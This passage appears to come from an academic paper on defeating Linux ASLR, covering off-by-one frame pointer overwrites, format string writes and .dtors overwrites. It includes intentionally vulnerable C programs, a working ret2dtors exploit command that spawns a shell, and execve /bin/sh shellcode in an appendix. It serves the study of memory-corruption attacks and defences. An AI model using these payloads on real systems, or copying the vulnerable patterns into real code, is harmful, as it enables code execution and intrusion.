Understanding the principle of exploiting an off-by-one requires sound knowledge of function epilogues. So keep in mind what happens when a function returns to its calling function:
leave = mov %ebp,%esp
        pop %ebp
ret   = pop %eip
Now consider figure 30, which illustrates the frame pointer overwrite. The numbering corresponds to the following explanation:
1. In the initial situation the saved frame pointer points to the beginning of the previous frame.
2. But due to an off-by-one vulnerability buff is overflowed and the SFP's least significant byte is overwritten with zero. With a bit of luck the forged saved frame pointer (FSP) now points into buff. The probability depends on the size of buff. If the FSP does not point into buff, a second chance is needed. Because of ASLR it is impossible to predict an exact position.
3. The first instruction of the function epilogue is executed (mov %ebp,%esp). Both the EBP and the ESP point to the FSP now.
4. The second instruction of the epilogue is executed (pop %ebp). Now the EBP points to a location within buff. The ESP points to the return instruction pointer.
5. The third instruction of the epilogue is executed (pop %eip). The ESP points to the top of the previous frame and the EIP contains the next (still correct) instruction of the calling function. The program flow proceeds with executing the calling function. Only the position of the EBP has been forged so far.
6. Assume the execution of the calling function is finished as well and the second function epilogue begins. So the next instruction is mov %ebp,%esp again. This forges the position of the ESP. The ESP points into buff now.
7. The next instruction is pop %ebp. It does not matter anymore where the EBP points now, but it is important that the ESP still points into buff.
8. The last instruction of the second epilogue is pop %eip. So the EIP register is overwritten with the value at the location the ESP points to, a location within buff. Therefore it is possible to execute shellcode by placing a well-chosen instruction pointer at this location. Because of ASLR this location cannot be determined exactly, so it is necessary to fill large parts of the buffer with the same instruction pointer.
As I already mentioned, this principle is nearly the same as without ASLR. The difference comes at the end: What should be written into the EIP register? This is exactly the ASLR problem that has been discussed in the previous sections. One possibility is to build a ret chain to a jmp *%esp instruction that is followed by the shellcode. With this technique the ret chain covers the need to fill up the buffer with identical instruction pointers. In figure 31 you can find a program that is vulnerable to this attack.
#include <stdio.h>
#include <string.h>
void save(char *str) {
    char buff[256];
    strncpy(buff, str, strlen(str) + 1);   /* copies the string and its zero byte */
}
void function(char *str) {
    save(str);
}
int main(int argc, char *argv[]) {
    int j = 58623;
    if (strlen(argv[1]) > 256)             /* length check done by the programmer */
        printf("Input out of size.");
    else
        function(argv[1]);
}
Figure 31: offbyone.c
The line that offers an off-by-one is not the strncpy call. This line does what the programmer wants: it copies the whole string str, including the terminating zero byte, to buff. The vulnerability is the if statement in the main function: The programmer forgot about the terminating zero byte and the behavior of strlen. A correct statement would check whether the input is longer than 255 characters. It is up to the reader to write an exploit, as it is a combination of already discussed techniques.
11 Overwriting .dtors
Format string vulnerabilities allow writing to arbitrary locations of the program memory. But it is essential to know the target address exactly. Therefore it is impossible to overwrite any stack contents (like return instruction pointers), since ASLR randomizes these addresses. However, there are still two pairs of interesting locations that are not randomized: the GOT/PLT entries and the .dtors/.ctors sections.
Overwriting the GOT/PLT entries has already been discussed in section 9. Now format string vulnerabilities are used to describe how to overwrite the .dtors section. But keep in mind that you are free to combine any of these techniques: You can overwrite GOT/PLT entries through format string vulnerabilities as well, or you can overwrite the .dtors section through vulnerabilities similar to the one shown in section 9.
First I will describe how to overwrite arbitrary memory locations in general using the "one shot" method. After that I will explain what the .dtors section is and why it makes sense to overwrite it. Finally I combine these into a ret2dtors attack and list an example and its exploit.
More detailed information about format string vulnerabilities can be found in [Scu01] and [ger02], more about overwriting the .dtors section in [Riv01].
11.1 One shot
Functions like printf can be induced to write into memory by the format instructions %n and %.mx. The task of %n is to store the number of characters that have been printed so far. The task of %.mx is to print a value as a hexadecimal number padded with leading zeros to at least m digits, which yields exactly m characters as long as the value itself needs no more. A combination of these format instructions makes it possible to write an arbitrary number to memory.
An example is given in figure 32. The output of the second printf command is 20, because the first printf command writes 20 zeros and stores this number in i.
#include <stdio.h>
int main(void) {
    int i = 0;
    printf("%.10x%.10x%n\n", i, i, &i);
    printf("%i\n", i);
}
Figure 32: oneshot1.c
So it is possible to write arbitrary numbers. The question is now: How can this number be written to an arbitrary location? The format instruction %n expects a pointer (e.g. &i in figure 32). Assume the content of an address a should be overwritten. There has to be a way to place a pointer to a on the stack. Furthermore, the offset from the format string pointer to the pointer to a has to be known. Assume this offset is f. A format string that contains the %n instruction at the f-th position has to be created and passed to the vulnerable program. With this technique an arbitrary address a can be overwritten.
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
    char buff[12];
    strcpy(buff, "AAAAAAAAAAA");
    int num = 1;
    int *ptr = (int *)buff;
    *(++ptr) = (int)&num;   /* store &num inside buff (32-bit pointers assumed) */
    printf(argv[1]);        /* format string vulnerability */
    printf("\n%i\n", num);
}
Figure 33: oneshot2.c
An example is given in figure 33. The arbitrary address a is the address &num here. It is placed in a buffer somewhere on the stack. For simplicity this address is not really arbitrary (i.e. it is not determined by user input).
So the address a is placed on the stack. What is still needed is the offset f. The following line allows us to determine f:
> ./oneshot2 %x_%x_%x_\
> %x_%x_%x_%x_%x_%x_%x
80484e0_c_b7e543ee_b7ef76d9_80495e0_bf973268_1_41414141_bf97325c_414141
Thus f = 9: the ninth value, directly after 41414141 (the "AAAA" at the start of buff), is the address a, which is 0xbf97325c in this example. It is possible to write to the address a by passing %n as the ninth format instruction. The following line writes the number 1234 to a; the seven %.10x instructions print 70 characters and %.1164x prints the remaining 1164:
> ./oneshot2 %.10x%.10x%.10x%\
> .10x%.10x%.10x%.10x%.1164x%n
1234
Moreover, there exists a so-called short write method, which can write large numbers much faster than the one shot method. It is described in [Scu01].
11.2 .dtors section
Every ELF binary contains two sections: .dtors (destructors) and .ctors (constructors). Destructors and constructors can be defined by the programmer (see figure 34) or not, but the sections exist either way. A constructor is called before main is executed and a destructor after the execution of main. Since a constructor is executed before any user input is read, the .ctors section is not exploitable for an attack, but the .dtors section is.
The .dtors section is a list of addresses which point to the destructors. This list is marked by a leading 0xffffffff and a trailing 0x00000000. For example, a binary dtors can be inspected by objdump as follows:
> objdump -s -j .dtors ./dtors
80495f8 ffffffff 54840408 00000000
So the .dtors section begins at 0x080495f8 and the location 0x080495fc points to a destructor. The code of the destructor begins at address 0x08048454 (objdump prints the bytes in memory order, so the little-endian word appears as 54840408).
An attack on the .dtors section would overwrite the location 0x080495fc with a shellcode pointer. The shellcode would be executed right after main exits.
11.3 ret2dtors
Consider the C program dtors listed in figure 34. It contains an snprintf vulnerability and the heap area heap_buff. This area is needed to hold the shellcode, as the heap is not randomized. Hence the example is a combination of ret2dtors and ret2heap.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
static void my_constructor(void) __attribute__((constructor));
void my_constructor(void) {
    printf("Constructor\n");
}
int main(int argc, char *argv[]) {
    char *heap_buff;
    heap_buff = (char *)malloc(strlen(argv[1]));
    strcpy(heap_buff, argv[1]);             /* shellcode ends up on the heap */
    char buff[32];
    snprintf(buff, sizeof(buff), argv[2]);  /* format string vulnerability */
    buff[sizeof(buff) - 1] = '\0';
}
Figure 34: dtors.c
The exploit below seems to be very complicated, but it isn't: The first parameter for the binary dtors is a shellcode that will be placed in heap_buff. The second parameter contains the format string that overwrites the .dtors section with the address of that shellcode on the heap. Therefore the address of the .dtors entry (0x080495fc) is written into buff. The offset from the format string pointer to the first location of buff is eight. So %n has to be the eighth format instruction and there is room for seven %mx instructions to define the number that should be written. This number is the first address of heap_buff, which is 0x0804a008. The distribution of this number is calculated as follows: 0x0804a008 = 134520840 = 4 + 6 * 20000000 + 14520828 + 8 (including the four bytes of the .dtors address at the start of the format string and eight bytes of underscores).
All the values I used can be determined with objdump and gdb. The exploit works as follows:
> ./dtors `./shellcode` \
> `perl -e 'print "\xfc\x95\x04\x08\
> _%20000000x_%20000000x_%20000000x_\
> %20000000x_%20000000x_%20000000x_\
> %14520828x_%n"'`;
Constructor
sh-3.1$ echo heap heap hurray!
heap heap hurray!
sh-3.1$
12 Conclusion
In summary, I listed the following methods to exploit programs protected by ASLR: DoS, brute force, ret2text, ret2bss, ret2data, ret2heap, string and function pointer redirecting, stack stethoscope and formatted information, ret2ret, ret2pop, ret2esp, ret2eax and finally ret2got. Furthermore, I pointed out that integer overflows, off-by-ones and .dtors overwrites are still exploitable under special circumstances (i.e. in combination with one of the ASLR smashing methods listed above). Some of these techniques, like ret2text (especially borrowed code), string and function pointer redirecting or ret2got, are also useful to bypass a non-executable stack.
So what I have shown is that ASLR, and therefore e.g. a standard Linux installation, is still highly vulnerable to memory manipulation. But ASLR is complementary to other prophylactic security techniques, and a combination of these technologies could provide a stronger defense. These technologies are mainly:
• Compiler extensions: StackGuard, StackShield, /GS option, bounds checking, canary
• Library wrappers: Libsafe, FormatGuard
• Environment modifications: PaX (complete ASLR), Openwall (non-executable stack)
• [Safe programming: source code analyzers, tracers, fuzzers]
Most of these techniques have been well known for years and provide better protection against memory manipulation than simple stack ASLR does. The question is why they are not implemented in the Linux kernel and enabled by default, too. The problems with these techniques are compatibility, stability and performance: Environment modifications slow down the machine, compiler extensions require a recompilation of every binary to take effect, and library wrappers are not compatible with every program.
So ASLR is not the best protection, but it disturbs a production system the least. Note that there are also problems relating to ASLR: The program flow is not totally deterministic, and this complicates debugging and crash analysis. For this reason it is possible to switch off ASLR at runtime.
[cor05], [Kle04]
A Shellcode
char shellcode[] =
    "\x31\xc0"      /* xor  %eax,%eax      */
    "\x50"          /* push %eax           */
    "\x68""//sh"    /* push $0x68732f2f    */
    "\x68""/bin"    /* push $0x6e69622f    */
    "\x89\xe3"      /* mov  %esp,%ebx      */
    "\x50"          /* push %eax           */
    "\x53"          /* push %ebx           */
    "\x89\xe1"      /* mov  %esp,%ecx      */
    "\x99"          /* cltd (clears %edx)  */
    "\xb0\x0b"      /* mov  $0xb,%al       */
    "\xcd\x80"      /* int  $0x80          */
    ;
int main(int argc, char *argv[]) {
    void (*code)() = (void (*)())shellcode;
    code();
}
References
[ble02] blexim. Basic Integer Overflows. http://www.phrack.org/archives/60/p60-0x0a.txt, 2002.
[c0n06a] c0ntex. Bypassing non-executable-stack during exploitation using return-to-libc. http://www.milw0rm.com/papers/31, 2006.
[c0n06b] c0ntex. How to hijack the Global Offset Table with pointers for root shells. http://www.milw0rm.com/papers/3, 2006.
[Con99] Matt Conover. w00w00 on Heap Overflows. http://www.w00w00.org/files/articles/heaptut.txt, 1999.
[cor05] corbet. Address space randomization in 2.6. http://lwn.net/Articles/121845/, 2005.
[Dul00] Thomas Dullien. Future of Buffer Overflows? http://diswww.mit.edu/menelaus/bt/17418, 2000. Bugtraq Posting.
[Dur02] Tyler Durden. Bypassing PaX ASLR protection. http://www.phrack.org/archives/59/p59-0x09.txt, 2002.
[Fos05] James Foster. Buffer Overflows, 2005.
[ger02] gera. Advances in format string exploitation. http://www.phrack.org/archives/59/p59-0x07.txt, 2002.
[Kle04] Tobias Klein. Buffer Overflows und Format-String-Schwachstellen, 2004. German.
[klo99] klog. The Frame Pointer Overwrite. http://doc.bughunter.net/buffer-overflow/frame-pointer.html, 1999.
[Kot05a] Izik Kotler. Advanced Buffer Overflow Methods. http://events.ccc.de/congress/2005/fahrplan/attachments/538-Slides_AdvancedBufferOverflowMethods.ppt, 2005.
[Kot05b] Izik Kotler. Smack the Stack. http://tty64.org/doc/smackthestack.txt, 2005.
[Kra05] Sebastian Krahmer. x86-64 buffer overflow exploits and the borrowed code chunks exploitation technique. http://www.suse.de/~krahmer/no-nx.pdf, 2005.
[One96] Aleph One. Smashing The Stack For Fun And Profit. http://insecure.org/stf/smashstack.html, 1996.
[PaX03] PaX. Documentation. http://pax.grsecurity.net/docs/, 2003.
[Riv01] Ruan Bello Rivas. Overwriting the .dtors section. http://synnergy.net/downloads/papers/dtors.txt, 2001.
[San06] Mulyadi Santosa. Understanding ELF using readelf and objdump. http://www.linuxforums.org/misc/understanding_elf_using_readelf_and_objdump_3.html, 2006.
[Scu01] Scut. Exploiting Format String Vulnerabilities. http://doc.bughunter.net/format-string/exploit-fs.html, 2001.
[Sha04] Hovav Shacham et al. On the Effectiveness of Address-Space Randomization. http://www.stanford.edu/~blp/papers/asrandom.pdf, 2004.
[Whi07] Ollie Whitehouse. An Analysis of ASLR on Windows Vista. http://www.symantec.com/avcenter/reference/Address_Space_Layout_Randomization.pdf, 2007.